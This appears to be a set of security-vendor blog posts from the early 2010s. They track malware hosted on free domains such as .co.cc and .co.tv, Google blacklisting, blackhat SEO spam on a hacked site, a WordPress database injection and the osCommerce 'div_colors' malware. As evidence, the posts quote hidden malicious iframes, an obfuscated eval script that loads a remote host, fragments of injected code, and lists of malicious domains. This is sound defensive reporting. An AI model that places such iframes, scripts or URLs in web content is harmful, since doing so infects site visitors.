Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj&#46co&#46tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc&#46co&#46tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf&#46co&#46tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

Google blacklisted all the .cz.cc domains

It seems that Google just blacklisted all the sites under the .cz.cc main domain (including the nic.cz.cc, start.cz.cc and all others). In their status page Google says:

Has this site acted as an intermediary resulting in further distribution of malware?

 
Over the past 90 days, cz.cc appeared to function as an intermediary for the infection of 13788 site(s) including uniform-net.jp/, nuxi-navi.com/, flashracingonline.com/.

 
Has this site hosted malware?

 
Yes, this site has hosted malicious software over the past 90 days. It infected 47193 domain(s), including razym.ru/, discuss.com.hk/, lnk.by/.

So according to Google, they infected more than 47 thousand domains. It is interesting because in the last few months the .cc TLD has been the most used by attackers, but it seems that Google decided to just blacklist everything (probably by mistake).

You can see this warning, by checking the status page on google for any site ending in .cz.cc: http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://anysite.cz.cc/ :

What is the current listing status for cz.cc?

Site is listed as suspicious – visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2907 time(s) over the past 90 days.

We will post more details if we learn back from Google.

TheWebbyAwards hacked and compromised with Blackhat SEO

The WebbyAwards web site ( www.webbyawards.com/ ) is currently hacked and compromised with Blackhat SEO. If you try to search for it on Google you will get a warning saying that “This site may be compromised”:

And if you look at the source code of the page, you will see thousands of hidden spam links in there (about selling Windows vista, buying office, etc) pointing to gl.iit.edu:8080, www.korea.edu, www.gefassembly.org, www.ncsconline.org and car.dost.gov.ph. Yes, all “important” and high PR sites (one university, two .gov sites, etc).

<a href="http://gl.iit.edu:8080/id=8085=WHERE-CAN-I-BUY-WINDOWS-7.html’>where can i buy windows 7</a>..

<a href="http://gl.iit.edu:8080/id=1974=BUY-MICROSOFT-OFFICE-2007-FOR.html">buy microsoft office 2007 for windows</a>

<a href="http://www.korea.edu/m02/m02_06_03.php?3142=Windows-Vista-Price.php’>windows vista price at targe..

<a href="http://www.gefassembly.org/administrator/modules/mod_title/mod_title.php?id=3387=COMPRAR-OFFICE-2007.aspx’>comprar office 200..

<a href="http://car.dost.gov.ph/libraries/phpgacl/.gacl.php?5656=Windows-7-Ultimate-(64-Bit).php’>cheap upgrade to windows ..

If you also search on Google for some of these terms (like “windows vista price at targe” ), you will see webby.aol.com (webbyawards.com) in the top pages already (along with some .gov and .edu web sites).

We have no details on how it was compromised yet, but we will keep you posted (if we hear back from them). If you are a site owner, take this as a reminder to make sure that all your sites are updated, using good passwords, monitored and following the best practices.


Site hacked? Infected with malware or spam? We are here to help.

Mass infections – globalpoweringgathering.com

We first detected malware from globalpoweringgathering.com almost a month ago, and posted on our blog about it. But in the last few days, we started to see a big increase in the number of sites infected with it.

We were able to catalog almost 3 thousand sites with this malware and Google lists almost 2 thousand sites in their safe browsing page (and it is growing each day – just yesterday it was less than 1 thousand):

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 1815 domain(s), including clonestop.com/, warseer.com/, showbiz411.com/.


Read More

CBS Money Watch / ZDnet hacked and blacklisted by Google

We are getting reports that the CBS Money Watch and some ZDNet web sites are currently distributing malware and blacklisted by Google. We are still investigating it, but if you try to visit the CBS Money watch site (moneywatch.com), you will get a warning from Google:



Read More

Ask Sucuri: How long it takes for a site to be removed from Google’s blacklist?

If you have any questions about malware, blacklisting, or security in general, send it to us: contact@sucuri.net and we will answer here. For all the “ask sucuri” answers, go here

Question: My site was hacked and we cleaned and secured it properly. We also scanned it, and it is showing up as clean, however, it is still blacklisted by Google. How long until they remove us?

This is a very common question. In fact, every time we clear a hacked site, their owner asks us the same question: How long until that scary red warning sign is gone?

To give a solid answer to our clients, for the last few months we started to time how long it takes from when the review submission is requested, until the site is removed by Google. We have now timed more than 500 blacklist removals so I think we have some good numbers to back us up.

heree are the results:
Read More

Database injection, lessthenaminutehandle.com and more updates

We posted a few weeks ago about a large scale database injection attack affecting WordPress on shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

We also saw multiple variations of it, where the following domains where used as the main intermediaries:

http://lessthenaseconddeal.com/ll.php?k=09

globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

What is interesting is the number of sub-intermediaries that change every few hours:

antivir1.mooo.com
antivirus-3654.co.cc
aqfwbngy.co.cc
defender-dyxa.co.cc
defender-kwwh.in
defender-wqga.in
defender-wtln.co.cc
pfoencut.co.cc
software-wujy.co.cc
system-scanner-ryes.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
zgfozmcr.co.cc
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.powernhgmdftkcleaner.myfw.us
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.smartsystemscanro.myfw.us
www3.specialprotectionti.rr.nu
www3.strongcheckera.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.avguardianpp.myfw.us
www4.avguardianst.myfw.us
www4.bestuhzscanner.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.strong-oppinternet.in
www4.thebestcheckernar.myfw.us
www4.top-only-scanner.uni.cc

They are using domains on multiple TLDs (.net, .com, .in, .us, etc) and changing every hour. The most common network for these to be hosted are at: 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them…

If you are worried your site might be vulneable, scan it here: http://sitecheck.sucuri.net


If your site is infected with malware or blacklisted, we are here to help.

The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
..


Read More

Will Google blacklist itself?

We were analyzing an infected site today and their Google blacklist diagnostic said the following:

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 3 domain(s), including site.com/, google.com/.

Hum… So Google.com was somehow infected as well? I know it is probably some small sub site from within Google, but I found it interesting that they listed Google’s main domain in there.

If you look at Google’s own diagnostic page, it says:

31 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-03-28, and the last time suspicious content was found on this site was on 2011-03-28.

 
Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, google.com appeared to function as an intermediary for the infection of 71 site(s) including our-pretty-pets.blogspot.com/, daum.net/, portovelhodownload.blogspot.com/.

 
Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 72 domain(s), including tamansoftware.co.cc/, agusnih.co.cc/, duniamisteri.co.cc/.

Let’s see if Google actually blacklists themselves :)

Database injection and lessthenaminutehandle.com – Intermediary domains

We posted a few days ago about a large scale database injection attack affecting shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

Nothing much different from other web-based malware that we have been tracking. But what is interesting about this attack is how fast the intermediaries domains are changing to avoid detection and getting blacklisted.

These are just some of the ones used in the last 24 hours:

http://defender-dyxa.co.cc/scan1/188

http://antivirus-3879.co.cc/scan1/188

http://antivirus-9465.co.cc/scan1/188

http://antivirus-4274.co.cc/scan1/188

http://yquwtuog.co.cc/scan1/188

http://mrxzvtwt.co.cc/scan1/188

http://lowoxnsm.co.cc/scan1/188

http://iuhcypsp.co.cc/scan1/188

http://vycdmonz.co.cc/scan1/188

http://zgfozmcr.co.cc/scan1/188

http://www4.personaldzfnetwork.rr.nu/?6276f6d=m%2BzgmGuilqSsld7K0KGtjOLZ4LTTo6Rj06Jmo6lqa1s%3D

http://www4.bestuhzscanner.rr.nu/?40ee785=m%2BzgmGuUlqWtm9jj16CUlOLZ3mumo2WjqGRkmp1qbFk%3D

http://www4.savezuzarmy.rr.nu/?47f2246dec=m%2BzgmGulkqieoOXjxa%2Bgn6Lm3muipmtsmWJmaW6XmYc%3D

http://www4.protection-leaderro.xe.cx/?ada145=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KkZKjLY5mpwog%3D

http://www4.protection-leaderri.xe.cx/?55db81=m%2BzgmGuio6Gti9PdzayhU%2BDZzaGXo6KeZKjLY5mpllk%3D

http://www4.strongnm-network.rr.nu/?38fdf=m%2BzgmGulpaSolNfX0Wqhi%2Bjr26%2FOX9inY56saJyWlIo%3D

http://www3.personal-tcsoft.rr.nu/?7660a2=m%2Bzgl2uilqSsld7K0Gqniefj0rGRo9hjo6Vua5pgkVY%3D

www3.strongcheckera.rr.nu
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.specialprotectionti.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

As you can see, changing from .cc, .co.cc, .in., .rr.nu and even some .com in there. Most of them are hosted at 46.252.130.200, but the IP address is changing as well. By checking those on Google, none of them got blacklisted, showing that their tactics are working.

We will keep posting details we learn more.


If your site is infected with malware or blacklisted, we are here to help.